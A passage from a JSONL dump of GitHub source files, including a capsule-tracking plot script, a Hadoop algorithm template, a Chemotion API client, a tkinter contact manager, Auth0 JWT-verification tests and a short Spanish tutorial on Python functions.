TJ_RRF.ResultsClass(pathRESLT4)\n \n inst = [TJ1, TJ2, TJ3, TJ4]\n names = [name1, name2, name3, name4]\n dia = [3.77, 3.77, 3.87, 4.00]\n pPmm = [22.4, 22.3, 22.2, 22.3]\n force = [3.1, 6.2, 9.2, 180]\n\n CP_TJ.plotMeanMaxAcceleration(listOfInstances =inst, \n listOfNames = names, pPmm=pPmm,\n savepath=sp, title = '', savename ='',\n show=True, forPub=True) \n# TandNDTvsQ(inst, names, sp)\n# plotGauss()\n# plotTimeAndRelaxation(inst, names,dia, pPmm, force, sp)\n# migrationVelocity(sp)\n# velocity(sp)\n# acceleration(sp)\n \ndef velocity(sp):\n #=============================================================================\n # Batch040615-002\n #=============================================================================\n centerline, width, pPmm3 = 635.5, 173, 22.2; geometryTJ=[36, 122, 549, 722] # \n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch040615-002\\\\T-Junction\\\\Capsule#1\\\\'\n FPS3=10; folder = 'Batch040615-002-#1-1S-5kcSt-%dFPS-5mlPmin-4\\\\' %FPS3 \n path3 = directory + folder #Test2\\\\'\n #=============================================================================\n tj.plotVelocity(path3, pPmm3, FPS3, savepath = sp, \n forPub=True, TJlim=[5.8,10.1], lim=[0, 16, 0, 4])\n FPS3=140; folder = 'Batch040615-002-#1-1S-5kcSt-%dFPS-70mlPmin-4\\\\' %FPS3 \n path3 = directory + folder #Test2\\\\'\n tj.plotVelocity(path3, pPmm3, FPS3, savepath = sp, \n forPub=True, TJlim=[0.7, 1.1], lim=[0.3, 1.6, 0, 60])\n \n \n #=============================================================================\n # Batch120615-004\n #=============================================================================\n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch120615-004\\\\T-Junction\\\\'\n FPS1 = 10; folder = 'Batch120615-001-#4-%dFPS-5mlPmin-10\\\\' %FPS1\n if FPS1 == 30:\n centerline, width, pPmm1 = 637, 175, 22.4; geometryTJ1=[72, 159, 550, 725] #Batch120615-004 #4 15ml/min\n else:\n centerline, width, pPmm1 = 637, 175, 22.4; geometryTJ1=[35, 118, 549, 724] #Batch120615-004 #4 Other Runs\n path1 = directory + folder #Test2\\\\'\n tj.plotVelocity(path1, pPmm1, FPS1, savepath = sp, \n forPub=True, TJlim=[7.5, 12.5], lim=[2, 21, 0, 4.5], cutoff=21)\n FPS1 = 10; folder = 'Batch120615-001-#4-%dFPS-5mlPmin-12\\\\' %FPS1\n path1 = directory + folder #Test2\\\\'\n tj.plotVelocity(path1, pPmm1, FPS1, savepath = sp, \n forPub=True, TJlim=[7.5, 15], lim=[2, 21, 0, 4.5])\n\ndef acceleration(sp):\n #=============================================================================\n # Batch120615-004\n #=============================================================================\n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch120615-004\\\\T-Junction\\\\'\n FPS1 = 10; folder = 'Batch120615-001-#4-%dFPS-5mlPmin-10\\\\' %FPS1\n if FPS1 == 30:\n centerline, width, pPmm1 = 637, 175, 22.4; geometryTJ1=[72, 159, 550, 725] #Batch120615-004 #4 15ml/min\n else:\n centerline, width, pPmm1 = 637, 175, 22.4; geometryTJ1=[35, 118, 549, 724] #Batch120615-004 #4 Other Runs\n path1 = directory + folder #Test2\\\\'\n tj.plotAcceleration(path1, pPmm1, FPS1, savepath = sp, \n forPub=True, TJlim=[7.5, 12.5], lim=[2, 21, -4.5, 4.5], cutoff=21)\n FPS1 = 100; folder = 'Batch120615-001-#4-%dFPS-50mlPmin-1\\\\' %FPS1\n path1 = directory + folder #Test2\\\\'\n tj.plotAcceleration(path1, pPmm1, FPS1, savepath = sp, \n forPub=True, TJlim=[0.9, 1.4], lim=[0.0, 2, -200, 200.0])\n \ndef migrationVelocity(sp): \n #=============================================================================\n # Batch260615-001\n #============================================================================= \n centerline, width, pPmm2 = 646, 174, 22.3; geometryTJ2=[28, 114, 559, 733] #Batch260615-001 #17\n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch260615-001\\\\T-Junction\\\\2015-07-01\\\\Batch260615-001-#17\\\\'\n FPS2=140; folder = 'Batch260615-001-#17-%dFPS-70mlPmin-1\\\\' %FPS2\n path2 = directory + folder \n \n #=============================================================================\n # Batch120615-004\n #=============================================================================\n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch120615-004\\\\T-Junction\\\\'\n FPS1 = 100; folder = 'Batch120615-001-#4-%dFPS-50mlPmin-1\\\\' %FPS1\n if FPS1 == 30:\n centerline, width, pPmm1 = 637, 175, 22.4; geometryTJ1=[72, 159, 550, 725] #Batch120615-004 #4 15ml/min\n else:\n centerline, width, pPmm1 = 637, 175, 22.4; geometryTJ1=[35, 118, 549, 724] #Batch120615-004 #4 Other Runs\n path1 = directory + folder #Test2\\\\'\n \n #Plots of Migration Velocity\n anPos=[0.69, -3.5, 0.8, -6.0, 1.10, 0.2, 0.8, -2.0,]\n tj.plotMigrationVelocity(path2, pPmm2, FPS2, geometryTJ2, savepath = sp, \n forPub=True, lim=[0.6, 1.25, -10, 3.5], anPos= anPos)\n #Batch120615-001-nr4-100FPS-50mlPmin-1\n anPos=[1.29, -2, 1.4, -6, 1.92, 0.3, 1.4, -2,]\n tj.plotMigrationVelocity(path1, pPmm1, FPS1, geometryTJ1, savepath = sp, \n forPub=True, lim=[1.1, 2.1, -10, 3.5], anPos= anPos)\n\n \ndef plotTimeAndRelaxation(inst, names, dia, pPmm, force, sp):\n\n CP_TJ.plotTimeVsOffcentre(listOfClassInstances =inst, \n listOfNames = names, \n listOfD0 = dia, pPmm = pPmm,\n nrCap=0, \n savepath=sp, \n show=True, forPub=False,\n absoluteV=False, NDT=True)\n\n CP_TJ.plotTimeVsOffcentre(listOfClassInstances =inst, \n listOfNames = names, \n listOfD0 = dia, pPmm = pPmm,\n nrCap=0, \n savepath=sp, \n show=True, forPub=True,\n absoluteV=False, NDT=True)\n\n CP_TJ.plotTimeVsOffcentre(listOfClassInstances =inst, \n listOfNames = names, \n listOfD0 = dia, pPmm = pPmm,\n nrCap=0, \n savepath=sp, \n show=True, forPub=False, \n absoluteV=True, NDT=True)\n \n CP_TJ.plotTimeVsOffcentre(listOfClassInstances =inst, \n listOfNames = names, \n listOfD0 = dia, pPmm = pPmm,\n nrCap=0, \n savepath=sp, \n show=True, forPub=True, \n absoluteV=True, NDT=True)\n\n CP_TJ.plotMinSpeed(listOfInstances =inst, listOfNames = names, \n listOfd0 = dia, savepath=sp, title = '', \n savename ='', show=True, nonDim=True, forPub=False)\n \n CP_TJ.plotRelaxationDistanceVsCa(listOfInstances =inst, listOfNames = names, \n pPmm = pPmm, force = force, \n listOfD0 = dia, savepath=sp, title = '', \n savename ='', \n show=True, forPub=False, ND=True)\n CP_TJ.plotRelaxationDistanceVsCa(listOfInstances =inst, listOfNames = names, \n pPmm = pPmm, force = force, \n listOfD0 = dia, savepath=sp, title = '', \n savename ='', \n show=True, forPub=True, ND=False)\n \n CP_TJ.plotRelaxationTimeVsCa(listOfInstances =inst, listOfNames = names, \n force = force, savepath=sp, title = '', \n savename ='', \n show=True, forPub=False, ND=True)\n \n CP_TJ.plotRelaxationTime(listOfInstances =inst, listOfNames = names, \n savepath=sp, title = '', savename ='', \n show=True, forPub=True, ND=False) \n\n CP_TJ.plotRelaxationTimeVsCa(listOfInstances =inst, listOfNames = names, \n force = force, savepath=sp, title = '', \n savename ='', \n show=True, forPub=True, ND=False) \n\n CP_TJ.plotRelaxationTime(listOfInstances =inst, listOfNames = names, \n savepath=sp, title = '', savename ='', \n show=True, forPub=True, ND=True) \n\n CP_TJ.plotRelaxationTimeVsCa(listOfInstances =inst, listOfNames = names, \n force = force, savepath=sp, title = '', \n savename ='', \n show=True, forPub=True, ND=True) \n\n CP_TJ.plotRelaxationSpeed(listOfInstances =inst, listOfNames = names, \n pPmm=pPmm, savepath=sp, title = '', \n savename ='', show=True, forPub=True)\n\n \ndef gaus(x,a,x0,sigma):\n return a*np.exp(-(x-x0)**2/(2*sigma**2))\n \ndef plotGauss():\n a=1.0\n x0=0.0\n x=np.arange(-1.0, 1.0, 0.001)\n plt.figure()\n \n sigma=1.0\n plt.plot(x, gaus(x,a,x0,sigma), label='1.0')\n sigma=0.1\n plt.plot(x, gaus(x,a,x0,sigma), label='0.1')\n sigma=10.0\n plt.plot(x, gaus(x,a,x0,sigma), label='10.0')\n plt.legend()\n \ndef TandNDTvsQ(inst, names, sp):\n CP_TJ.plotTvsQ(listOfInstances = inst, \n listOfNames = names, \n savepath=sp, \n title = '', \n savename ='', \n show=True, \n forPub=True, \n nondimensionalise=False)\n\n CP_TJ.plotTvsQ(listOfInstances = inst, \n listOfNames = names, \n savepath=sp, \n title = '', \n savename ='', \n show=True, \n forPub=True, \n nondimensionalise=True)\n\ndef averageOffset(pathRESLT1, pathRESLT2, pathRESLT3,pathRESLT4):\n TJ1 = TJ_RRF.ResultsClass(pathRESLT1)\n print(TJ1.offCentre)\n Lic = TJ1.offCentre/22.4\n TJ2 = TJ_RRF.ResultsClass(pathRESLT2)\n TJ3 = TJ_RRF.ResultsClass(pathRESLT3)\n TJ4 = TJ_RRF.ResultsClass(pathRESLT4)\n Lic = np.concatenate((Lic, TJ2.offCentre/22.3))\n Lic = np.concatenate((Lic, TJ3.offCentre/22.2))\n Lic = np.concatenate((Lic, TJ4.offCentre/22.3))\n \n print(\"Mean Lic = %f\" %(np.mean(Lic)))\n \ndef commandsToGeneratePlotsForThesis():\n sp = \"M:\\\\EdgarHaener\\\\Capsules\\\\PlotScripts\\\\T-Junction-RESLT\\\\\"\n trajectoryPlots(sp)\n\ndef trajectoryPlots(savepath):\n # Batch120615-004\n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch120615-004\\\\T-Junction\\\\'\n FPS = 10; folder = 'Batch120615-001-#4-%dFPS-5mlPmin-4\\\\' %FPS\n path1 = directory + folder #Test2\\\\'\n FPS = 80; folder = 'Batch120615-001-#4-%dFPS-40mlPmin-6\\\\' %FPS\n path2 = directory + folder #Test2\\\\'\n centerline, width, pPmm = 637, 175, 22.4; geometryTJ=[35, 118, 549, 724] #Batch120615-004 #4 Other Runs\n \n tj.plotTrajecotry(path = path1, pPmm=pPmm, geometryTJ = geometryTJ, savepath = savepath, forPub=True)\n tj.plotTrajecotry(path = path2, pPmm=pPmm, geometryTJ = geometryTJ, savepath = savepath, forPub=True)\n \ndef areaAndPerimeter(savepath):\n # Batch120615-004\n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch120615-004\\\\T-Junction\\\\'\n FPS1 = 20; folder = 'Batch120615-001-#4-%dFPS-10mlPmin-4\\\\' %FPS1 ; path1 = directory + folder #Test2\\\\'\n FPS2 = 100; folder = 'Batch120615-001-#4-%dFPS-50mlPmin-1\\\\' %FPS2 ; path2 = directory + folder #Test2\\\\'\n centerline, width, pPmm = 637, 175, 22.4; geometryTJ=[35, 118, 549, 724] #Batch120615-004 #4 Other Runs\n \n TJ_ROF.plotAreaAndPerimeter(path1, FPS1, pPmm, 3.0*FPS1, 5.75*FPS1 , xmax=10.0, savepath=savepath)\n TJ_ROF.plotAreaAndPerimeter(path2, FPS2, pPmm, 0.9*FPS2, 1.4*FPS2, xmax=2.2, savepath=savepath)\n \n\n # Batch040615-002\n centerline, width, pPmm = 635.5, 173, 22.2; geometryTJ=[36, 122, 549, 722] #\n \n directory = 'M:\\\\EdgarHaener\\\\Capsules\\\\Batch040615-002\\\\T-Junction\\\\Capsule#1\\\\'\n FPS1=10; folder = 'Batch040615-002-#1-1S-5kcSt-%dFPS-5mlPmin-2\\\\' %FPS1 ; path1 = directory + folder \n FPS2=140; folder = 'Batch040615-002-#1-1S-5kcSt-%dFPS-70mlPmin-6\\\\' %FPS2 ; path2 = directory + folder \n \n TJ_ROF.plotAreaAndPerimeter(path1, FPS1, pPmm, 5.0*FPS1, 9*FPS1 , xmax=16.0, savepath=savepath)\n TJ_ROF.plotAreaAndPerimeter(path2, FPS2, pPmm, 0.575*FPS2, 0.875*FPS2, xmax=1.5, savepath=savepath)\n\n\nif __name__ == \"__main__\":\n# print(\"Starting 'funfunc'\")\n runfunc()","repo_name":"EdgarMCR/Track-Capsules-OpenCV","sub_path":"runscript_T-Junction.py","file_name":"runscript_T-Junction.py","file_ext":"py","file_size_in_byte":21742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7653280699","text":"from m3d.hadoop.algorithm.algorithm_hadoop import AlgorithmHadoop\nfrom m3d.hadoop.algorithm.scala_classes import ScalaClasses\nfrom m3d.hadoop.emr.emr_system import EMRSystem\n\n\nclass AlgorithmAlgorithmTemplate(AlgorithmHadoop):\n\n def __init__(self, execution_system, algorithm_instance, algorithm_params):\n \"\"\"\n Initialize Algorithm Algorithm Template\n\n :param execution_system: an instance of EMRSystem object\n :param algorithm_instance: name of the algorithm instance\n :param algorithm_params: algorithm configuration\n \"\"\"\n\n super(AlgorithmAlgorithmTemplate, self).__init__(execution_system, algorithm_instance, algorithm_params)\n\n self.source_table = self._execution_system.db_lake + \".\" + self._parameters[\"source_table\"]\n # you can use a source location as parquet files on the lake instead of a hive table\n # make sure not the repeat the full path again on the acon file if you have the following concatenation logic\n # self.source_location = os.path.join(\"s3://\",\n # self._execution_system.bucket_lake, self._parameters[\"source_location\"])\n self.target_table = self._execution_system.db_lake + \".\" + self._parameters[\"target_table\"]\n\n self.output_dictionary = {\n \"source_table\": self.source_table,\n # you can use a source location as parquet files on the lake instead of a hive table\n # \"source_location\": self.source_location,\n \"target_table\": self.target_table,\n \"date_from\": self._parameters[\"date_from\"],\n \"date_to\": self._parameters[\"date_to\"]\n }\n\n execution_system.add_cluster_tags({\n EMRSystem.EMRClusterTag.SOURCE_TABLE: self.source_table,\n EMRSystem.EMRClusterTag.TARGET_TABLE: self.target_table\n })\n\n def get_scala_class(self):\n return ScalaClasses.ALGORITHM_TEMPLATE\n\n def build_params(self):\n return self.output_dictionary\n","repo_name":"adidas/m3d-api","sub_path":"m3d/hadoop/algorithm/algorithm_algorithm_template.py","file_name":"algorithm_algorithm_template.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"78"} +{"seq_id":"17923127725","text":"import json\nimport os.path\nimport re\nimport uuid\n\nfrom chemotion_api.connection import Connection\n\nfrom chemotion_api.generic_segments import GenericSegments\nfrom chemotion_api.utils import add_to_dict, parse_generic_object_json, \\\n clean_generic_object_json\n\nfrom requests.exceptions import RequestException\n\nclass Dataset(dict):\n def __init__(self, session: Connection, json_data: dict):\n self.id = json_data.get('id')\n self.name = json_data.get('name')\n self.description = json_data.get('description')\n ds_json = json_data.get('dataset')\n if ds_json is not None:\n res = parse_generic_object_json(ds_json)\n super().__init__(res.get('values'))\n self._mapping = res.get('obj_mapping')\n self._session = session\n self._json_data = json_data\n\n def write_zip(self, destination=''):\n image_url = \"/api/v1/attachments/zip/{}\".format(self.id)\n res = self._session.get(image_url)\n if res.status_code != 200:\n raise ConnectionRefusedError('{} -> {}'.format(res.status_code, res.text))\n\n if not os.path.exists(destination) or os.path.isdir(destination):\n regex_file_name = re.search('filename=\"([^\"]+)',res.headers['Content-Disposition'] )\n destination = os.path.join(destination, regex_file_name.groups()[0])\n\n with open(destination, 'wb+') as f:\n f.write(res.content)\n\n return destination\n\n def write_data_set_xlsx(self, destination=''):\n image_url = \"/api/v1/attx/dataset/{}\".format(self.id)\n res = self._session.get(image_url)\n if res.status_code != 200:\n raise ConnectionRefusedError('{} -> {}'.format(res.status_code, res.text))\n\n if not os.path.exists(destination) or os.path.isdir(destination):\n regex_file_name = re.search('filename=\"([^\"]+)',res.headers['Content-Disposition'] )\n destination = os.path.join(destination, regex_file_name.groups()[0])\n\n with open(destination, 'wb+') as f:\n f.write(res.content)\n\n return destination\n\n def to_json(self):\n ds = self._json_data.get('dataset')\n if ds is not None:\n clean_generic_object_json(ds, self, self._mapping)\n ds['changed'] = True\n\nclass Analyses(dict):\n def __init__(self, data, session: Connection):\n super().__init__()\n self._session = session\n self.id = data.get('id')\n self.type = data.get('extended_metadata', {}).get('kind', '')\n\n self._data = data\n self['name'] = data['name']\n self['description'] = data['description']\n self.datasets = []\n for jd in self._data.get('children'):\n self.datasets.append(Dataset(session, jd))\n\n def preview_image(self):\n if self._data.get('preview_img') is None or self._data.get('preview_img').get('id') is None:\n return None\n return self._load_image(self._data.get('preview_img').get('id'))\n\n def _load_image(self, file_id: int):\n image_url = \"/api/v1/attachments/{}\".format(file_id)\n res = self._session.get(image_url)\n if res.status_code != 200:\n raise ConnectionRefusedError('{} -> {}'.format(res.status_code, res.text))\n\n return res.content\n\n def to_josn(self):\n self._data['name'] = self['name']\n self._data['description'] = self['description']\n for ds in self.datasets:\n ds.to_json()\n return self._data\n\n\nclass Segment(dict):\n def __init__(self, generic_segments: GenericSegments, element_type: str, on_add, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._generic_segments = generic_segments\n self._element_type = element_type\n self._on_add = on_add\n\n def get(self, key):\n val = super().get(key)\n if val is None:\n seg = next((x for x in self._generic_segments.all_classes if x.get('label') == key), None)\n if seg.get('element_klass').get('name') != self._element_type:\n raise TypeError('Segemnt \"{}\" is not for element \"{}\"'.format(key, self._element_type))\n new_seq_obj = GenericSegments.new_session(seg)\n key = add_to_dict(self, key, None)\n val = self[key] = self._on_add(key, new_seq_obj)\n return val\n\n\nclass AbstractElement:\n element_type = None\n def __init__(self, generic_segments: GenericSegments, session: Connection, json_data: dict = None, id: int = None, element_type: str = None):\n self._generic_segments = generic_segments\n self._session = session\n if json_data is not None:\n self._set_json_data(json_data)\n elif id is not None and element_type is not None:\n self.id = id\n self.element_type = element_type\n self.load()\n else:\n raise ValueError(\"Either 'json_data' or 'id' and 'element_type' must be provided during initialization\")\n def load(self):\n\n payload = {}\n res = self._session.get(\"{}/{}.json\".format(self.__class__.get_url(self.element_type), self.id),\n data=payload)\n if res.status_code != 200:\n raise RequestException(\"{} -> {}\".format(res.status_code, res.text))\n json_data = res.json()[self.get_response_key(self.element_type)]\n self._set_json_data(json_data)\n\n\n def _set_json_data(self, json_data):\n self.json_data = json_data\n\n self.short_label = self.json_data.get('short_label')\n self.id = json_data.get('id')\n self.element_type = json_data.get('type')\n\n self.properties: dict = self._parse_properties()\n self.analyses: list[dict] = self._parse_analyses()\n segment_temp = self._parse_segments()\n self._segments_mapping = segment_temp.get('obj_mapping')\n self.segments = Segment(self._generic_segments,\n json_data.get('type'),\n self._on_add_segment,\n segment_temp.get('values'))\n add_to_dict(self.segments, 'Properties', self.properties)\n add_to_dict(self.segments, 'Analyses', self.analyses)\n\n def _on_add_segment(self, key: str, segment_data: dict) -> dict:\n temp_segment = parse_generic_object_json(segment_data)\n self._segments_mapping[key] = temp_segment.get('obj_mapping')\n self.json_data.get('segments', []).append(segment_data)\n return temp_segment.get('values')\n\n def save(self):\n data = self.clean_data()\n is_created = False\n if self.id is None:\n data['id'] = uuid.uuid4().__str__()\n res = self._session.post(self.save_url(), data=json.dumps(data))\n is_created = True\n else:\n res = self._session.put(self.save_url(), data=json.dumps(data))\n if res.status_code != 200 and res.status_code != 201:\n raise RequestException('{} -> '.format(res.status_code, res.text))\n if is_created:\n self._set_json_data(res.json()[self.element_type])\n\n def clean_data(self):\n self._clean_segments_data()\n self._clean_properties_data()\n self._clean_analyses_data()\n return self.json_data\n\n def save_url(self):\n if self.id is not None:\n return \"/api/v1/{}s/{}\".format(self.json_data.get('type'), self.id)\n return \"/api/v1/{}s\".format(self.json_data.get('type'))\n\n def _parse_properties(self) -> dict:\n raise NotImplemented\n\n def _clean_properties_data(self) -> dict:\n raise NotImplemented\n\n def _parse_analyses(self) -> list:\n analyses_list = []\n container = self.json_data.get('container')\n if container is not None:\n for analyses in container.get('children', [{}])[0].get('children', []):\n analyses_list.append(Analyses(analyses, self._session))\n return analyses_list\n\n def _clean_analyses_data(self):\n container = self.json_data.get('container')\n if container is None:\n return []\n res_list = container.get('children', [{}])[0].get('children', [])\n for (idx, analyses) in enumerate(res_list):\n analyses_obj: list[Analyses] = [item for (index, item) in enumerate(self.analyses) if\n item.id == analyses.get('id')]\n if len(analyses_obj) == 1:\n new_data = analyses_obj[0].to_josn()\n for (key, item) in analyses.items():\n if key in new_data:\n res_list[idx][key] = new_data.get(key, res_list[idx][key])\n\n return res_list\n\n def _parse_segments(self) -> dict[str: dict]:\n results: dict[str: dict] = {}\n results_mapping: dict[str: dict] = {}\n for segment in self.json_data.get('segments', []):\n a = [x for x in self._generic_segments.all_classes if x['id'] == segment['segment_klass_id']]\n temp_segment = parse_generic_object_json(segment)\n key = add_to_dict(results, a[0].get('label', 'no_label'), temp_segment.get('values'))\n results_mapping[key] = temp_segment.get('obj_mapping')\n return {'values': results, 'obj_mapping': results_mapping}\n\n def _clean_segments_data(self):\n res_list = self.json_data.get('segments', [])\n for (seg_key, segment_mapping) in self._segments_mapping.items():\n list_idx = next(i for (i, x) in enumerate(res_list) if x.get('id') == segment_mapping['__id'])\n clean_generic_object_json(res_list[list_idx], self.segments[seg_key], segment_mapping)\n\n\n\n @classmethod\n def get_response_key(cls, name):\n if name == 'sample':\n return 'sample'\n elif name == 'reaction':\n return 'reaction'\n elif name == 'wellplate':\n return 'wellplate'\n elif name == 'research_plan':\n return 'research_plan'\n return 'element'\n\n @classmethod\n def get_url(cls, name):\n if name == 'sample':\n return '/api/v1/samples'\n elif name == 'reaction':\n return '/api/v1/reactions'\n elif name == 'wellplate':\n return '/api/v1/wellplates'\n elif name == 'research_plan':\n return '/api/v1/research_plans'\n return f'/api/v1/generic_elements'\n","repo_name":"StarmanMartin/ChemotionApi","sub_path":"chemotion_api/elements/abstract_element.py","file_name":"abstract_element.py","file_ext":"py","file_size_in_byte":10363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6698804202","text":"import tkinter as tk\r\nfrom tkinter import messagebox\r\n\r\nclass ContactManager:\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.title(\"Contact Manager\")\r\n\r\n self.contacts = []\r\n self.current_contact = None\r\n\r\n self.name_label = tk.Label(root, text=\"Name:\")\r\n self.name_label.pack()\r\n\r\n self.name_entry = tk.Entry(root)\r\n self.name_entry.pack()\r\n\r\n self.phone_label = tk.Label(root, text=\"Phone:\")\r\n self.phone_label.pack()\r\n\r\n self.phone_entry = tk.Entry(root)\r\n self.phone_entry.pack()\r\n\r\n self.email_label = tk.Label(root, text=\"Email:\")\r\n self.email_label.pack()\r\n\r\n self.email_entry = tk.Entry(root)\r\n self.email_entry.pack()\r\n\r\n self.address_label = tk.Label(root, text=\"Address:\")\r\n self.address_label.pack()\r\n\r\n self.address_entry = tk.Entry(root)\r\n self.address_entry.pack()\r\n\r\n self.add_button = tk.Button(root, text=\"Add Contact\", command=self.add_contact)\r\n self.add_button.pack()\r\n\r\n self.view_button = tk.Button(root, text=\"View Contacts\", command=self.view_contacts)\r\n self.view_button.pack()\r\n\r\n self.search_label = tk.Label(root, text=\"Search:\")\r\n self.search_label.pack()\r\n\r\n self.search_entry = tk.Entry(root)\r\n self.search_entry.pack()\r\n\r\n self.search_button = tk.Button(root, text=\"Search Contacts\", command=self.search_contacts)\r\n self.search_button.pack()\r\n\r\n self.update_button = tk.Button(root, text=\"Update Contact\", command=self.update_contact)\r\n self.update_button.pack()\r\n\r\n self.delete_button = tk.Button(root, text=\"Delete Contact\", command=self.delete_contact)\r\n self.delete_button.pack()\r\n\r\n def add_contact(self):\r\n name = self.name_entry.get()\r\n phone = self.phone_entry.get()\r\n email = self.email_entry.get()\r\n address = self.address_entry.get()\r\n\r\n if name and phone:\r\n self.contacts.append({\"name\": name, \"phone\": phone, \"email\": email, \"address\": address})\r\n messagebox.showinfo(\"Success\", \"Contact added successfully.\")\r\n else:\r\n messagebox.showerror(\"Error\", \"Name and phone are required.\")\r\n\r\n def view_contacts(self):\r\n view_window = tk.Toplevel(self.root)\r\n view_window.title(\"View Contacts\")\r\n\r\n for contact in self.contacts:\r\n contact_text = f\"Name: {contact['name']}\\nPhone: {contact['phone']}\\nEmail: {contact['email']}\\nAddress: {contact['address']}\\n\"\r\n contact_label = tk.Label(view_window, text=contact_text)\r\n contact_label.pack()\r\n\r\n def search_contacts(self):\r\n query = self.search_entry.get()\r\n results = []\r\n\r\n for contact in self.contacts:\r\n if query.lower() in contact['name'].lower() or query in contact['phone']:\r\n results.append(contact)\r\n\r\n if results:\r\n result_window = tk.Toplevel(self.root)\r\n result_window.title(\"Search Results\")\r\n\r\n for contact in results:\r\n contact_text = f\"Name: {contact['name']}\\nPhone: {contact['phone']}\\nEmail: {contact['email']}\\nAddress: {contact['address']}\\n\"\r\n contact_label = tk.Label(result_window, text=contact_text)\r\n contact_label.pack()\r\n else:\r\n messagebox.showinfo(\"No Results\", \"No contacts found matching the search.\")\r\n\r\n def update_contact(self):\r\n if self.current_contact:\r\n updated_name = self.name_entry.get()\r\n updated_phone = self.phone_entry.get()\r\n updated_email = self.email_entry.get()\r\n updated_address = self.address_entry.get()\r\n\r\n self.current_contact['name'] = updated_name\r\n self.current_contact['phone'] = updated_phone\r\n self.current_contact['email'] = updated_email\r\n self.current_contact['address'] = updated_address\r\n\r\n self.current_contact = None\r\n messagebox.showinfo(\"Success\", \"Contact updated successfully.\")\r\n else:\r\n messagebox.showerror(\"Error\", \"No contact selected for update.\")\r\n\r\n def delete_contact(self):\r\n if self.current_contact:\r\n self.contacts.remove(self.current_contact)\r\n self.current_contact = None\r\n messagebox.showinfo(\"Success\", \"Contact deleted successfully.\")\r\n else:\r\n messagebox.showerror(\"Error\", \"No contact selected for deletion.\")\r\n\r\nif __name__ == \"__main__\":\r\n root = tk.Tk()\r\n app = ContactManager(root)\r\n root.mainloop()\r\n","repo_name":"Laibak12/Codsoft_Augustbatch","sub_path":"contact book.py","file_name":"contact book.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32976690457","text":"import pytest\nimport jwt\nfrom fastapi import HTTPException, status\n\nfrom optipy.api.exceptions import BadRequestFromRaisedException\nfrom optipy.config import settings\n\nfrom ..auth0 import VerifyToken\n\n\n@pytest.fixture\ndef verify_token():\n return VerifyToken()\n\n\nclass TestVerifyToken:\n\n def test_verify_valid_token(self, mocker, verify_token):\n key = \"test_key\"\n mock_jwks_client = mocker.MagicMock()\n mock_jwks_client.get_signing_key_from_jwt.return_value = mocker.MagicMock(\n key=key\n )\n verify_token.jwks_client = mock_jwks_client\n\n token = \"valid_token\"\n decoded_token = {\"sub\": \"12345\", \"name\": \"John Doe\"}\n\n mock_decode = mocker.MagicMock()\n mock_decode.return_value = decoded_token\n mocker.patch(\"jwt.decode\", mock_decode)\n\n result = verify_token.verify(token)\n\n assert result == decoded_token\n mock_decode.assert_called_with(\n token,\n key,\n algorithms=settings.AUTH0_ALGORITHMS,\n audience=settings.AUTH0_API_AUDIENCE,\n issuer=settings.AUTH0_ISSUER\n )\n\n def test_verify_invalid_jwk_client(self, mocker, verify_token):\n mock_jwks_client = mocker.MagicMock()\n mock_jwks_client.get_signing_key_from_jwt.side_effect = jwt.exceptions.PyJWKClientError\n verify_token.jwks_client = mock_jwks_client\n\n token = \"invalid_token\"\n\n with pytest.raises(HTTPException) as exc_info:\n verify_token.verify(token)\n\n assert exc_info.value.status_code == status.HTTP_400_BAD_REQUEST\n assert exc_info.value.detail == \"Error while trying to initialize JWK client.\"\n\n def test_verify_decode_error(self, mocker, verify_token):\n mock_jwks_client = mocker.MagicMock()\n mock_jwks_client.get_signing_key_from_jwt.side_effect = jwt.exceptions.DecodeError\n verify_token.jwks_client = mock_jwks_client\n\n token = \"invalid_token\"\n\n with pytest.raises(HTTPException) as exc_info:\n verify_token.verify(token)\n\n assert exc_info.value.status_code == status.HTTP_400_BAD_REQUEST\n assert exc_info.value.detail == \"Error decoding JWT token.\"\n\n def test_verify_invalid_token(self, mocker, verify_token):\n mock_jwks_client = mocker.MagicMock()\n mock_jwks_client.get_signing_key_from_jwt.return_value = mocker.MagicMock()\n verify_token.jwks_client = mock_jwks_client\n\n token = \"invalid_token\"\n\n with pytest.raises(HTTPException) as exc_info:\n verify_token.verify(token)\n\n assert exc_info.value.status_code == status.HTTP_400_BAD_REQUEST\n assert exc_info.value.detail == \"Error decoding JWT token\"\n\n def test_verify_generic_exception(self, mocker, verify_token):\n mock_jwks_client = mocker.MagicMock()\n mock_jwks_client.get_signing_key_from_jwt.return_value = mocker.MagicMock(\n key=\"dummy_key\"\n )\n verify_token.jwks_client = mock_jwks_client\n\n token = \"valid_token\"\n exception_message = \"Something went wrong\"\n exception = Exception(exception_message)\n\n mock_decode = mocker.MagicMock(side_effect=exception)\n mocker.patch(\"jwt.decode\", mock_decode)\n\n with pytest.raises(BadRequestFromRaisedException) as exc_info:\n verify_token.verify(token)\n assert str(exc_info.value) == exception_message\n","repo_name":"zigcccc/optipy","sub_path":"optipy/auth/tests/test_auth0.py","file_name":"test_auth0.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22676788128","text":"#FUNCIONES\r\n\r\n#Sin argumentos\r\n\r\n#def para crear una funcion\r\n# Defino mi función\r\nfrom black import out\r\n\r\n\r\ndef rocket_parts():\r\n print('payload, propellant, structure')\r\n\r\n# Llamo a mi función\r\nrocket_parts()\r\n\r\noutput = rocket_parts()\r\nprint(output)\r\n\r\ndef rocket_parts2():\r\n return 'payload, propellant, structure'\r\n\r\noutput2= rocket_parts2()\r\nprint(output2)\r\n \r\n\r\n#Argumentos\r\ndef 